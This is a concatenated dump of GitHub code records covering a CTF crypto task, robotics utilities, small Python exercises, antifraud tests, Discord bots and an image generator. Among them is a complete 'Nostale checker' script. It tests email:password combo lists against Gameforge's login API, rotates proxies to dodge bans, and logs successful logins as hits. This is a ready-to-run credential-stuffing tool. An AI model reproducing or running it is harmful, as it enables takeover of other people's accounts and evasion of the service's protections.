proof_of_work():\n # return\n \n secret = getrandbits(1024)\n print(\"Listen...The secret iz...M2@9c0f*#aF()I!($Ud3;J...\"\n \"Hello?...really noisy here again...God bless you get it...\")\n for i in range(64):\n try:\n op = input().strip()\n num = input().strip()\n except EOFError:\n return\n if not str.isnumeric(num):\n print(\"INVALID NUMBER\")\n continue\n num = int(num)\n if op == 'god':\n print(num * getrandbits(992) % secret)\n elif op == 'bless':\n if num == secret:\n\n try:\n from datetime import datetime\n except Exception as e:\n FLAG = \"but something is error. Please contact the admin.\"\n\n print(\"SYC{123321}\")\n return\n print(\"WRONG SECRET\")\nmain()\n","repo_name":"ljahum/crypto-challenges","sub_path":"2020归档/ByteCTF/noise/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27162803849","text":"import sys\nfrom app.main.jobs.tools_runner.console_parameters import ConsoleToolParameters\n\n\nclass AccuracyCheckerCliParameters(ConsoleToolParameters):\n\n def __init__(self):\n super(AccuracyCheckerCliParameters, self).__init__()\n self.path = sys.executable\n\n def __str__(self, parameter_prefix='-'):\n if not self.exe:\n raise AssertionError('Name of application did not set')\n exe_path = self.path + ' ' + self.exe\n params = ' '.join(\n ['{p}{k} {v}'.format(p=parameter_prefix, k=key, v=value) for key, value in self.params.items()])\n return exe_path + ' ' + params\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/tools/workbench/app/main/console_tool_wrapper/accuracy_tools/accuracy_cli_parameters.py","file_name":"accuracy_cli_parameters.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"74022466770","text":"import math\nfrom typing import Tuple, List\nimport numpy as np\n\nimport tf\nfrom tf import transformations as ts\n\nfrom geometry_msgs.msg import TransformStamped\nfrom nav_msgs.msg import Odometry\nfrom autodock_core.msg import AutoDockingFeedback\n\n\n##############################################################################\n\nPose2D = Tuple[float, float, float]\n\n\nclass DockState:\n INVALID = AutoDockingFeedback.STATE_INVALID\n IDLE = AutoDockingFeedback.STATE_IDLE\n PREDOCK = AutoDockingFeedback.STATE_PREDOCK\n PARALLEL_CORRECTION = AutoDockingFeedback.STATE_PARALLEL_CORRECTION\n STEER_DOCK = AutoDockingFeedback.STATE_STEER_DOCK\n LAST_MILE = AutoDockingFeedback.STATE_LAST_MILE\n ACTIVATE_CHARGER = AutoDockingFeedback.STATE_ACTIVATE_CHARGER\n RETRY = AutoDockingFeedback.STATE_RETRY\n PAUSE = AutoDockingFeedback.STATE_PAUSE\n\n def to_string(input):\n _map = {\n DockState.INVALID: 'INVALID',\n DockState.IDLE: 'IDLE',\n DockState.PREDOCK: 'PREDOCK',\n DockState.PARALLEL_CORRECTION: 'PARALLEL_CORRECTION',\n DockState.STEER_DOCK: 'STEER_DOCK',\n DockState.LAST_MILE: 'LAST_MILE',\n DockState.ACTIVATE_CHARGER: 'ACTIVATE_CHARGER',\n DockState.RETRY: 'RETRY',\n DockState.PAUSE: 'PAUSE'\n }\n return _map[input]\n\n def to_percent(input):\n \"\"\"\n Simple util to convert DockState to percent representation,\n use in publishing feedback in dock server\n \"\"\"\n _map = {\n DockState.IDLE: 0.0,\n DockState.PREDOCK: 0.15,\n DockState.PARALLEL_CORRECTION: 0.35,\n DockState.STEER_DOCK: 0.50,\n DockState.LAST_MILE: 0.8,\n DockState.ACTIVATE_CHARGER: 0.9,\n DockState.RETRY: 0.1,\n DockState.PAUSE: 0.1 # TODO\n }\n return _map[input]\n\n##############################################################################\n\n\ndef get_2d_inverse(pose_2d: Pose2D) -> Pose2D:\n \"\"\"\n Inverse a 2d transformation, mainly to switch the frame of reference\n :param tf1, tf2: 2d transformation\n :return: 2d tf of [x, y, yaw]\n \"\"\"\n _tr = (pose_2d[0], pose_2d[1], 0)\n _q = ts.quaternion_from_euler(0, 0, pose_2d[2])\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n _i_tf_mat = ts.inverse_matrix(_tf_mat)\n trans = ts.translation_from_matrix(_i_tf_mat)\n euler = ts.euler_from_matrix(_i_tf_mat)\n return trans[0], trans[1], euler[2]\n\n\ndef get_centre_tf(tf1: np.ndarray, tf2: np.ndarray, offset=0.0) -> Pose2D:\n \"\"\"\n Get centre point of both tf1 and tf2, Note that this output new frame\n has a different orientation as the marker, which it's frame is x axis\n (pointing out of the marker) is directed towards the robot's camera.\n :param tf1, tf2: 4x4 homogenous matrix from tf1 and tf2\n :param offset: (optional) offset target point to the normal\n :return: 2d tf of the centre [x, y, yaw]\n \"\"\"\n x1, y1, _ = get_2d_pose(tf1)\n x2, y2, _ = get_2d_pose(tf2)\n _x = (x1 + x2)/2\n _y = (y1 + y2)/2\n _yaw = -math.atan2((x2 - x1), (y2 - y1))\n _x += math.cos(_yaw)*offset\n _y += math.sin(_yaw)*offset\n # print(\"Inverse! \", get_2d_inverse((_x, _y, _yaw))) # for sanity check\n return _x, _y, _yaw\n\n\ndef get_mat_from_transfrom_msg(msg: TransformStamped) -> np.ndarray:\n \"\"\"\n This will return a homogenous transformation of transform msg\n :param : input transform msg\n :return : homogenous transformation matrix\n \"\"\"\n _rot = msg.transform.rotation\n _q = (_rot.x, _rot.y, _rot.z, _rot.w)\n\n _trans = msg.transform.translation\n _tr = (_trans.x, _trans.y, _trans.z)\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n return _tf_mat\n\n\ndef get_mat_from_odom_msg(msg: Odometry) -> np.ndarray:\n \"\"\"\n This will return a homogenous transformation of odom pose msg\n :param : input odom msg\n :return : homogenous transformation matrix\n \"\"\"\n _rot = msg.pose.pose.orientation\n _q = (_rot.x, _rot.y, _rot.z, _rot.w)\n _trans = msg.pose.pose.position\n _tr = (_trans.x, _trans.y, _trans.z)\n _tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(_tr), ts.quaternion_matrix(_q))\n return _tf_mat\n\n\ndef get_2d_pose(_tf: np.ndarray) -> Pose2D:\n \"\"\"\n :param: input homogenous matrix\n :return : 2dPose in x, y, yaw format\n \"\"\"\n trans = ts.translation_from_matrix(_tf)\n euler = ts.euler_from_matrix(_tf)\n return trans[0], trans[1], euler[2]\n\n\ndef apply_2d_transform(mat: np.ndarray, transform: Pose2D) -> np.ndarray:\n \"\"\"\n Apply a 2d transform to a homogenous matrix\n :param mat: the input 4x4 homogenous matrix\n :param transform : 2d transform which to apply to the mat\n :return : transformed homogenous transformation matrix\n \"\"\"\n # req target transformation from base\n q = tf.transformations.quaternion_from_euler(0, 0, transform[2])\n tf_mat = ts.concatenate_matrices(\n ts.translation_matrix(\n (transform[0], transform[1], 0)), ts.quaternion_matrix(q))\n return np.matmul(mat, tf_mat)\n\n\ndef compute_tf_diff(current_tf: np.ndarray, ref_tf: np.ndarray) -> Pose2D:\n \"\"\"\n Find the diff of two transformation matrix\n :param : homogenous transformation of 2 matrices\n :return : the 2d planer trans fo the 2 inputs; [x, y, yaw]\n \"\"\"\n tf_diff = np.matmul(ts.inverse_matrix(current_tf), ref_tf)\n trans = ts.translation_from_matrix(tf_diff)\n euler = ts.euler_from_matrix(tf_diff)\n return trans[0], trans[1], euler[2]\n\n\ndef avg_2d_poses(poses: List[Pose2D]) -> Pose2D:\n \"\"\"\n Provide the average of a list of 2D poses\n :param poses : a list of 2d poses\n :return : output avg Pose2D\n \"\"\"\n _l = len(poses)\n if (_l == 0):\n return None\n _x = 0\n _y = 0\n _yaw = 0\n for pose in poses:\n _x += pose[0]\n _y += pose[1]\n _yaw += pose[2]\n return _x/_l, _y/_l, _yaw/_l\n\n\ndef sat_proportional_filter(\n input: float, abs_min=0.0, abs_max=10.0, factor=1) -> float:\n \"\"\"\n Simple saturated proportional filter\n :param input : input value\n :param abs_min and abs_max : upper and lower bound, abs value\n :param factor : multiplier factor for the input value\n :return : output filtered value, within boundary\n \"\"\"\n output = 0.0\n input *= factor\n if abs(input) < abs_min:\n if (input < 0):\n output = -abs_min\n else:\n output = abs_min\n elif abs(input) > abs_max:\n if (input > 0):\n output = abs_max\n else:\n output = -abs_max\n else:\n output = input\n return output\n\n\ndef bin_filter(input: float, abs_boundary: float) -> float:\n \"\"\"\n Simple binary filter, will provide abs_ceiling as a binary output,\n according to the 'negativity' of the input value\n :param input : input value\n :param abs_boundary : abs boundary value\n :return : output binary value\n \"\"\"\n output = abs(abs_boundary)\n if input < 0:\n output = -abs(abs_boundary)\n return output\n\n\ndef flip_yaw(yaw: float) -> float:\n \"\"\"\n Flip yaw angle by 180 degree, input yaw range should be within\n [-pi, pi] radian. Else use set_angle() fn to fix the convention.\n Output will also be within the same range of [-pi, pi] radian.\n \"\"\"\n if yaw >= 0:\n return yaw - math.pi\n else:\n return yaw + math.pi\n\n\ndef set_angle(angle: float) -> float:\n \"\"\"\n Ensure the angle is within the range of [-pi, pi] radian convention\n \"\"\"\n return math.atan2(math.sin(angle), math.cos(angle))\n\n\ndef flip_base_frame(input: Pose2D):\n \"\"\"\n Flip the current reference frame by 180 degree. As such, the negativity \n of translation is flipped, and the yaw angle is located at the opposite \n quadrant. Currently is used to flip from 'back dock' to 'front dock'\n \"\"\"\n return -input[0], -input[1], flip_yaw(input[2])\n","repo_name":"osrf/autodock","sub_path":"autodock_core/scripts/autodock_core/autodock_utils.py","file_name":"autodock_utils.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"66"} +{"seq_id":"24148016016","text":"import time\n\nprint('Press ENTER to begin. Afterwards, press ENTER to \"click\" the stopwatch. Press \"cc\" to quit.')\ninput()\nprint('Started.')\nstarttime = time.time()\nlasttime = starttime\nlapNum = 1\n\ntry:\n while True:\n input_text = input()\n if input_text == 'cc':\n raise Exception('Done.')\n # 循环一圈的时间\n lapTime = round(time.time() - lasttime, 2)\n # 总循环时间\n totalTime = round(time.time() - starttime, 2)\n print('Lap #%s: %s (%s)' % (lapNum, totalTime, lapTime))\n lapNum += 1\n lasttime = time.time()\nexcept Exception as err:\n print(err)\n","repo_name":"qiyue0421/automate_the_boring_stuff_with_python","sub_path":"20190310_2.py","file_name":"20190310_2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73616672851","text":"valorCasa = float(input('Valor da casa (R$): '))\nsalario = float(input('Salário do comprador: '))\ntempo = int(input('Tempo para pagamento (anos): '))\nnParcelas = tempo * 12\nvrParcela = valorCasa / nParcelas\nif vrParcela / salario <= 0.30:\n print('Proposta de financiamento: \\033[33m{} '\n 'parcelas mensais\\033[m de \\033[33mR$ {:.2f}\\033[m.'.format(nParcelas, vrParcela))\nelse:\n print('Solicitação de financiamento \\033[31mnegada\\033[m.')\n","repo_name":"cassiorabelo/Estudonauta-Python","sub_path":"Desafios/a12d036 analFinanc.py","file_name":"a12d036 analFinanc.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5490713939","text":"import discord\nimport asyncio\nclient = discord.Client()\n@client.event\nasync def on_ready():\n\twhile 1:\n\t\tfor guild in client.guilds:\n\t\t\tfor member in guild.members:\n\t\t\t\tfor x in member.activities:\n\t\t\t\t\tif type(x) == discord.Game:\n\t\t\t\t\t\tprint(x)\n\t\t\t\t\t\tif str(x) == \"Geometry Dash\":\n\t\t\t\t\t\t\ta = await client.get_user_info(member.id)\n\t\t\t\t\t\t\tawait a.send(f'You have been banned from `{guild}`\\nReason: playing GD')\n\t\t\t\t\t\t\tawait guild.ban(member)\n\t\tawait asyncio.sleep(5)\nclient.run(\"TOKEN_HHERE\")\n","repo_name":"xewoks/AntiGDBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34783202700","text":"from pico2d import *\r\nimport random\r\n\r\nclass Grass:\r\n def __init__(self):\r\n self.image = load_image('grass.png')\r\n self.x, self.y = 400, 30\r\n def draw(self):\r\n self.image.draw(self.x, self.y)\r\n\r\n def update(self):\r\n pass\r\n\r\nclass Boy:\r\n def __init__(self):\r\n self.x, self.y = 100, 90\r\n self.image = load_image('run_animation.png')\r\n self.frame = 0\r\n\r\n def draw(self):\r\n sx = self.frame * 100\r\n self.image.clip_draw(sx, 0, 100, 100, self.x, self.y)\r\n\r\n def update(self):\r\n self.frame = (self.frame + 1) % 8\r\n self.x += 1\r\n\r\ndef handle_events():\r\n global loop\r\n events = get_events()\r\n for e in events:\r\n if e.type == SDL_QUIT:\r\n loop = False # end the game loop \r\n elif e.type == SDL_KEYDOWN:\r\n if e.key == SDLK_ESCAPE:\r\n loop = False\r\n\r\nopen_canvas()\r\n\r\ng = Grass()\r\nboys = [Boy() for i in range(11)]\r\nx = 100\r\nfor b in boys:\r\n b.x = x\r\n x += 50\r\n\r\nloop = True\r\nwhile (loop):\r\n #b.update()\r\n for b in boys: \r\n b.update()\r\n\r\n clear_canvas()\r\n\r\n g.draw()\r\n for b in boys:\r\n b.draw()\r\n\r\n update_canvas()\r\n handle_events()\r\n\r\n delay(0.03) \r\n\r\nclose_canvas()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"surimLee/Python_study_","sub_path":"game6.py","file_name":"game6.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33556070432","text":"import pytest\n\nfrom test_taxi_antifraud.utils import utils\n\n\n@pytest.mark.parametrize(\n 'params',\n [\n ({'order_id': 'not_existing_value'}),\n ({'phone_id': 'not_existing_value'}),\n ({'personal_phone_id': 'not_existing_value'}),\n ],\n)\nasync def test_get_antifake_triggering_no_data(web_app_client, params):\n response = await web_app_client.get(\n '/v1/get_antifake_triggering_list', params=params,\n )\n assert response.status == 200\n\n assert await response.json() == []\n\n\n@pytest.mark.parametrize(\n 'params',\n [\n ({}),\n ({'phone_id': 'some_value', 'order_id': 'some_value'}),\n ({'order_id': 'some_value', 'personal_phone_id': 'some_value'}),\n (\n {\n 'order_id': 'some_value',\n 'personal_phone_id': 'some_value',\n 'phone_id': 'some_value',\n }\n ),\n ],\n)\nasync def test_get_antifake_triggering_bad_request(web_app_client, params):\n response = await web_app_client.get(\n '/v1/get_antifake_triggering_list', params=params,\n )\n assert response.status == 400\n\n\n@pytest.mark.parametrize(\n 'params,expected',\n [\n (\n {'phone_id': 'some_phone_id'},\n [\n {\n 'order_id': 'some_order',\n 'device_id': 'some_device',\n 'user_id': 'some_user',\n 'personal_phone_id': 'some_personal',\n 'triggered_rules': ['some_rule', 'another_rule'],\n 'triggering_time': '2019-12-20T09:05:39.000Z',\n 'phone_id': 'some_phone_id',\n },\n ],\n ),\n (\n {'order_id': 'some_order'},\n [\n {\n 'order_id': 'some_order',\n 'device_id': 'some_device',\n 'user_id': 'some_user',\n 'personal_phone_id': 'some_personal',\n 'triggered_rules': ['some_rule', 'another_rule'],\n 'triggering_time': '2019-12-20T09:05:39.000Z',\n 'phone_id': 'some_phone_id',\n },\n ],\n ),\n (\n {'personal_phone_id': 'some_personal'},\n [\n {\n 'order_id': 'some_order',\n 'device_id': 'some_device',\n 'user_id': 'some_user',\n 'personal_phone_id': 'some_personal',\n 'triggered_rules': ['some_rule', 'another_rule'],\n 'triggering_time': '2019-12-20T09:05:39.000Z',\n 'phone_id': 'some_phone_id',\n },\n {\n 'order_id': 'some_order1',\n 'device_id': 'some_device1',\n 'metrica_device_id': 'metrica_id',\n 'user_id': 'some_user1',\n 'personal_phone_id': 'some_personal',\n 'triggered_rules': ['some_rule1'],\n 'triggering_time': '2019-12-21T09:05:39.000Z',\n 'phone_id': 'some_phone_id1',\n 'orders_total': 45,\n 'orders_complete': 0,\n },\n ],\n ),\n ],\n)\nasync def test_get_antifake_triggering_base(web_app_client, params, expected):\n response = await web_app_client.get(\n '/v1/get_antifake_triggering_list', params=params,\n )\n assert response.status == 200\n\n result = utils.convert_datetimes(\n await response.json(), ['triggering_time'],\n )\n expected = utils.convert_datetimes(expected, ['triggering_time'])\n\n assert result == expected\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_taxi_antifraud/antifake_triggering/test_get_antifake_triggering_info.py","file_name":"test_get_antifake_triggering_info.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26565987069","text":"import json\nfrom PIL import Image, ImageDraw, ImageFont\n\nW = 1200\nH = 630\n\n# Open fonts\ntimes_120 = ImageFont.truetype('/mnt/c/Windows/Fonts/times.ttf', 120)\narial_black_40 = ImageFont.truetype('/mnt/c/Windows/Fonts/ariblk.ttf', 40)\narial_black_52 = ImageFont.truetype('/mnt/c/Windows/Fonts/ariblk.ttf', 52)\n\n# Open TOC JSON\ntoc_data = None\nwith open('_data/toc.json') as f:\n toc_data = json.load(f)\n\ndef CreateImageDirect(title, problem_title, location):\n # Create Image\n img = Image.new('RGB', (W, H), color = (255, 255, 255))\n d = ImageDraw.Draw(img)\n\n # Write texts\n d.rectangle([W/2 - 260, 50, W/2 + 260, 120], fill = (71, 41, 163))\n d.text((W/2, 100), \"CLRS SOLUTIONS\", font=arial_black_40, fill = (255, 255, 255), anchor=\"ms\")\n d.text((W/2, 180), problem_title, font=arial_black_52, fill = (45, 25, 120), anchor=\"ms\")\n d.rectangle([W/2 - 260, 120, W/2 + 260, 200], outline = (71, 41, 163), width=4)\n d.text((W/2, 360), title, font=times_120, fill = (0, 0, 0), align=\"center\", anchor=\"ms\", spacing=20)\n\n # Save image\n img.save(location)\n\ndef CreateImage(chapter, section, problem_id):\n title = ''\n problem_title = ''\n image_folder = ''\n image_filename = ''\n\n if isinstance(chapter, int):\n image_folder = f\"assets/img/{chapter:02d}/\"\n else:\n image_folder = f\"assets/img/{chapter}/\"\n\n if section > 0:\n problem_title = f\"Exercise {chapter}.{section}-{problem_id}\"\n image_filename = f\"{chapter}.{section:}-{problem_id}.jpg\"\n if isinstance(chapter, int):\n title = toc_data['chapters'][chapter - 1]['sections'][int(section) - 1]['name']\n else:\n title = toc_data['appendices'][int(chapter) - 'A']['sections'][int(section) - 1]['name']\n else:\n problem_title = f\"Problem {chapter}-{problem_id}\"\n image_filename = f\"{chapter}-{problem_id}.jpg\"\n if isinstance(chapter, int):\n title = toc_data['chapters'][chapter - 1]['problems'][problem_id - 1]['name']\n else:\n title = toc_data['appendices'][int(chapter) - 'A']['problems'][problem_id - 1]['name']\n \n title_parts = title.split(' ')\n title = ''\n num_chars = 0\n for part in title_parts:\n title += part + ' '\n num_chars += len(part)\n if (num_chars > 12):\n num_chars = 0\n title += '\\n'\n\n # Create Image\n img = Image.new('RGB', (W, H), color = (255, 255, 255))\n d = ImageDraw.Draw(img)\n\n # Write texts\n d.rectangle([W/2 - 260, 50, W/2 + 260, 120], fill = (71, 41, 163))\n d.text((W/2, 100), \"CLRS SOLUTIONS\", font=arial_black_40, fill = (255, 255, 255), anchor=\"ms\")\n d.text((W/2, 180), problem_title, font=arial_black_52, fill = (45, 25, 120), anchor=\"ms\")\n d.rectangle([W/2 - 260, 120, W/2 + 260, 200], outline = (71, 41, 163), width=4)\n d.text((W/2, 360), title, font=times_120, fill = (0, 0, 0), align=\"center\", anchor=\"ms\", spacing=20)\n\n # Save image\n img.save(image_folder + image_filename)\n\n# chapter = 1\n# prob_list = [\n# [i for i in range(1, 2)],\n# [i for i in range(1, 6)],\n# [i for i in range(1, 4)]\n# ]\n\n# chapter = 2\n# prob_list = [\n# [i for i in range(1, 5)],\n# [i for i in range(1, 5)],\n# [i for i in range(1, 5)],\n# [i for i in range(1, 7)]\n# ]\n\n# chapter = 3\n# prob_list = [\n# [i for i in range(1, 7)],\n# [i for i in range(1, 9)],\n# [i for i in range(1, 9)]\n# ]\n\n# chapter = 4\n# prob_list = [\n# [i for i in range(1, 1)],\n# [i for i in range(1, 6)],\n# [i for i in range(1, 8)],\n# [i for i in range(1, 10)],\n# [i for i in range(1, 8)],\n# [i for i in range(1, 5)]\n# ]\n\n# for section, lst in enumerate(prob_list):\n# if section == 0:\n# continue\n# for prob in lst:\n# CreateImage(chapter, section, prob)\n\nfor i in range(1, 8):\n CreateImageDirect(\"Recursion-tree Method\\nfor Solving Recurrences\", f\"Exercise 4.4-{i}\", f\"assets/img/04/4.4-{i}.jpg\")","repo_name":"Atekihcan/CLRS","sub_path":"utils/GenerateImage.py","file_name":"GenerateImage.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"25093836155","text":"import discord\nfrom discord.ext import commands\n\nrules = [\n \"Do not post or talk about NSFW content in text or voice chat. This server is a safe for work, that is except in\",\n \"Be respectful of all members, especially Staff.\",\n \"Avoid topics such as: Politics,Religion,Self-Harm or anything considered controversial anywhere on the server except on the **Debate Club**\",\n \"Do not advertise your server or other communities without express consent from an Owner of this server.\",\n \"Do not share others' personal information without their consent.\",\n \"Do not flood or spam the text chat. Do not tag native roles repeatedly without a reason.\",\n \"No ear rape or mic spam. If you have a loud background, go on push-to-talk or mute.\",\n \"Try to settle disputes personally. You may mute or block a user. If you cannot resolve the issue, contact staff in <#685832739517366340>\",\n \"Do not impersonate users or member of the staff \",\n \"No asking to be granted roles/moderator roles, you may apply in <#671788773733826628> but begging the staff repeatedly and irritatingly will result in warnings or even ban.\"]\n\n\nclass Show(commands.Cog):\n '''\n Commands involving showing some information related to the server.\n '''\n\n def __init__(self, client):\n self.client = client\n\n @commands.Cog.listener()\n async def on_ready(self):\n print('Show cog is ready!')\n\n # Shows how many members there are in the server\n @commands.command()\n async def members(self, ctx):\n '''\n Shows how many members there are in the server (including bots).\n '''\n await ctx.message.delete()\n all_users = ctx.guild.members\n await ctx.send(f'{len(all_users)} members!')\n\n # Shows the specific rule\n @commands.command()\n async def rule(self, ctx, numb: int = None):\n '''\n Shows a specific server rule.\n :param numb: The number of the rule to show.\n '''\n await ctx.message.delete()\n if not numb:\n return await ctx.send('**Invalid parameter!**')\n if numb > 10 or numb <= 0:\n return await ctx.send('**Paremeter out of range!**')\n\n embed = discord.Embed(title=f'Rule - {numb}#', description=f\"{rules[numb - 1]}\",\n colour=discord.Colour.dark_green())\n embed.set_footer(text=ctx.author.guild.name)\n await ctx.send(embed=embed)\n\n\ndef setup(client):\n client.add_cog(Show(client))\n","repo_name":"xxxAnn/sloth-bot","sub_path":"cogs/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3272572223","text":"#Nostale checker (PROXY VERSION) - V4\r\nimport sys\r\nimport os\r\nimport requests as r\r\nfrom playsound import playsound\r\n\r\ndef cls():\r\n os.system('cls')\r\n\r\ncls()\r\napi = \"https://spark.gameforge.com/api/v1/auth/thin/sessions\"\r\naccount_number = 0\r\nproxy_number = 0\r\ncombo_position = 0\r\nproxy_position = 0\r\nhit = 0\r\nbanner = \"\"\"\r\n ▐ ▄ .▄▄ · ▄▄▄▄▄ ▄▄▄· ▄▄▌ ▄▄▄ . ▄▄· ▄ .▄▄▄▄ . ▄▄· ▄ •▄ ▄▄▄ .▄▄▄\r\n•█▌▐█▪ ▐█ ▀. •██ ▐█ ▀█ ██• ▀▄.▀·▐█ ▌▪██▪▐█▀▄.▀·▐█ ▌▪█▌▄▌▪▀▄.▀·▀▄ █·\r\n▐█▐▐▌ ▄█▀▄ ▄▀▀▀█▄ ▐█.▪▄█▀▀█ ██▪ ▐▀▀▪▄██ ▄▄██▀▐█▐▀▀▪▄██ ▄▄▐▀▀▄·▐▀▀▪▄▐▀▀▄\r\n██▐█▌▐█▌.▐▌▐█▄▪▐█ ▐█▌·▐█ ▪▐▌▐█▌▐▌▐█▄▄▌▐███▌██▌▐▀▐█▄▄▌▐███▌▐█.█▌▐█▄▄▌▐█•█▌\r\n▀▀ █▪ ▀█▄▀▪ ▀▀▀▀ ▀▀▀ ▀ ▀ .▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀ · ▀▀▀ ·▀▀▀ ·▀ ▀ ▀▀▀ .▀ ▀\r\n By Kynda - V4\r\n\r\n Nouvelles fonctions :\r\n [+] Changement de proxy automatique et infinies\r\n [+] Pas de sauts de comptes\r\n \r\n Merci à ArSenal pour l'api et les keywords\r\n\"\"\"\r\n\r\ntry:\r\n file = open('combo.txt',\"r\")\r\n combo = file.readlines()\r\n file.close\r\nexcept IOError:\r\n create = open(\"combo.txt\",\"a\")\r\n create.close()\r\n sys.exit(\"[!] On dirait bien que tu n'as pas fait de combos.\")\r\ntry:\r\n file = open(\"proxies.txt\",\"r\")\r\n proxies = file.readlines()\r\n file.close()\r\nexcept IOError:\r\n create = open(\"proxies.txt\",\"a\")\r\n create.close()\r\n sys.exit(\"[!] On dirait bien que tu as oublié tes proxies.\")\r\nprint(banner)\r\nfor acc in combo:\r\n account_number+=1\r\nfor proxy in proxies:\r\n proxy_number+=1\r\nif account_number == 0:\r\n sys.exit(\"Le fichier combo est vide.\")\r\nif proxy_number == 0:\r\n sys.exit(\"Le fichier proxies est vide.\")\r\ntotal_account = str(account_number)\r\nprint(\"[i] Nombre de comptes: \"+total_account+'\\n[i] Nombre de proxies: '+str(proxy_number))\r\naccount_number-=1\r\nwhile combo_position <= account_number:\r\n credentials = combo[combo_position]\r\n credentials = credentials.strip()\r\n account = credentials.split(\":\")\r\n email = account[0]\r\n password = account[1]\r\n try:\r\n actual_proxy = proxies[proxy_position].strip\r\n except IndexError:\r\n print(\"La liste de proxy est épuisé.\")\r\n print(\"[i] Dernier compte check : \"+credentials)\r\n proxy_position = 0\r\n actual_proxy = proxies[proxy_position].strip\r\n print(\"Le checker recommence avec le premier proxy.\")\r\n actual_proxy = actual_proxy.split(\":\")\r\n ip = actual_proxy[0]\r\n port = actual_proxy[1]\r\n request_proxy = {\r\n \"https\":\"https://\"+ip+\":\"+port\r\n }\r\n data = {\"identity\":email,\"password\":password,\"locale\":\"fr_FR\",\"gfLang\":\"fr\",\"platformGameId\":\"dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9\"}\r\n try:\r\n rep = r.post(api,data=data,proxies=request_proxy)\r\n if \"token\" in rep.text:\r\n playsound('hit.mp3')\r\n hit+=1\r\n print(\"[\"+str(hit)+\"] Nostale [->] \" + credentials +\"\\n\")\r\n save = open(\"output.txt\",\"a\")\r\n save.write(\"[\"+str(hit)+\"] Nostale [->]\" + credentials+\"\\n\")\r\n save.close()\r\n combo_position+=1\r\n elif \"Unauthorized\" in rep.text:\r\n combo_position+=1\r\n proxy_position+=1\r\n print(\"[\"+str(combo_position) +\"/\"+total_account+\"] \"+credentials)\r\n elif \"Forbidden\" in rep.text:\r\n playsound('ban.mp3')\r\n print(\"[!] Le proxy est banni\")\r\n proxy_position+=1\r\n else:\r\n print(\"Une erreur inconnue s'est produite : \\n\"+rep.text)\r\n except:\r\n print(\"[i] Impossible de se connecter au proxy.\\nNouvelle connexion proxy établie.\")\r\n proxy_position+=1\r\n\r\nsys.exit(\"[+] Le travail est terminé.\")\r\n#Mec j'sais pas quoi ajouter mais 105 lignes c'est vachement + classe","repo_name":"Shadawks/Nostale-checker","sub_path":"nostale.py","file_name":"nostale.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73871049810","text":"import sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\n\ngraph = [[INF]*(n+1) for _ in range(n+1)]\nfor i in range(1, n+1):\n graph[i][i] = 0\n\nfor i in range(m):\n a, b = map(int, input().split())\n graph[a][b], graph[b][a] = 1, 1\n\nfor k in range(1, n+1):\n for a in range(1, n+1):\n for b in range(1, n+1):\n graph[a][b] = min(graph[a][b], graph[a][k]+graph[k][b])\n\nresult_val = INF\nfor i in range(1, n+1):\n if sum(graph[i][1:]) < result_val:\n result = i\n result_val = sum(graph[i][1:])\n\nprint(result)\n","repo_name":"gimquokka/problem-solving","sub_path":"BOJ/boj_1389_6단계.py","file_name":"boj_1389_6단계.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"23425393172","text":"import sys\nfrom ciphertext import CipherText\nfrom playfairgrid import PlayfairGrid\n\ndef main():\n\tif len(sys.argv) < 1:\n\t\tprint('Please include some arguments.')\n\t\treturn\n\n\tmode = 'encrypt'\n\ttext = ''\n\tkey = None\n\n\tif '-f' in sys.argv:\n\t\tif len(sys.argv) <= sys.argv.index('-f') + 1:\n\t\t\tprint('Need an accompanying file name')\n\t\t\treturn\n\n\t\ttextFile = open(sys.argv[sys.argv.index('-f')+1])\n\t\ttext = textFile.read()\n\t\ttextFile.close()\n\n\tif '-t' in sys.argv:\n\t\tif len(sys.argv) <= sys.argv.index('-t') + 1:\n\t\t\tprint('Need ciper text')\n\t\t\treturn\n\n\t\ttext = sys.argv[sys.argv.index('-t')+1]\n\n\tif '-d' in sys.argv:\n\t\tmode = 'decrypt'\n\n\tif '-k' in sys.argv:\n\t\tif len(sys.argv) < sys.argv.index('-k') + 1:\n\t\t\tprint('add key after key flag')\n\t\t\treturn\n\t\tkey = 